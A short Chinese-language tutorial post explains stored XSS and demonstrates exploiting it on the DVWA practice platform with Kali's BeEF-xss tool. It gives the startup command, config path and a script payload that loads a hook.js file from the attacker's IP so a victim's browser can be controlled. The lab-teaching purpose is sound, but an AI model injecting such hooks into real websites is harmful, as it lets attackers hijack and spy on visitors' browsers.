一、存储型XSS漏洞利用原理

攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本。

二、漏洞利用演示

(1)使用的工具

  1、DVWA漏洞演示平台

  2、攻击工具:kali中自带的Beef-xss

(2)漏洞利用过程:
  1、DVWA界面:

2、beef-xss工具

  kali中自带此工具,打开终端输入beef-xss即可,首次使用需要修改默认的账号密码。若后期忘记密码可以查看配置文件/etc/beef-xss/config.yaml。登录地址为:http://127.0.0.1:3000/ui/panel

界面:

接着根据beef-xss的提示在存在存储型XSS漏洞处插入恶意代码:<script src="http://<IP>:3000/hook.js"></script>,<IP>为攻击IP地址,然后等鱼上钩即可。

使用另一台测试机访问被插入恶意代码的网页,在beef-xss中就可以看到鱼儿上钩。

在beef-xss中有很多模块可以使用

以上就是存储型XSS的简单利用。

最新文章

  1. ZOJ 2048 highways
  2. 深入浅出REST
  3. crm 2013邮箱设置 “允许使用凭据进行电子邮件处理” 被禁用的解决
  4. 中国能用的NTP服务器地址
  5. iOS runtime 的经典作用
  6. Delphi函数的返回值(注意这里与C/C++等语言有差异)
  7. RxJava操作符之Share, Publish, Refcount
  8. 创建ORACLE JOB
  9. Delphi判断字符串是否是数字、字母、大小写字母
  10. [改善Java代码]线程优先级只使用三个等级
  11. WIN7 Net Configuration Assistant打不开
  12. linux----LAMP之编译安装apache
  13. c语言统计字符数(判断a-z哪个字符出现次数最多)
  14. canvas绘制百分比圆环进度条
  15. LeetCode 560. Subarray Sum Equals K (子数组之和等于K)
  16. Centos环境下搭建Asp.NET Core环境和安装Jexus
  17. TCP 通信
  18. asp.net core系列 29 EF模型配置(查询类型,关系数据库建模)
  19. Python实现邮件的批量发送
  20. CF1107E Vasya and Binary String

热门文章

  1. misc之套娃编码解密
  2. 【转载】github.com访问慢解决办法
  3. 分享一般.net core的web项目发布到服务器环境的处理步骤(来自本人实践笔记)
  4. 一步步教你在Edge浏览器上安装网风笔记
  5. 微服务框架——SpringBoot
  6. 算法之倍增和LCA:论点与点之间的攀亲戚
  7. 记OPNsense防火墙的安装过程 - 安全
  8. File类获取功能的方法-File类判断功能的方法
  9. JDK的下载与安装-环境变量的配置
  10. Spring中常见的注解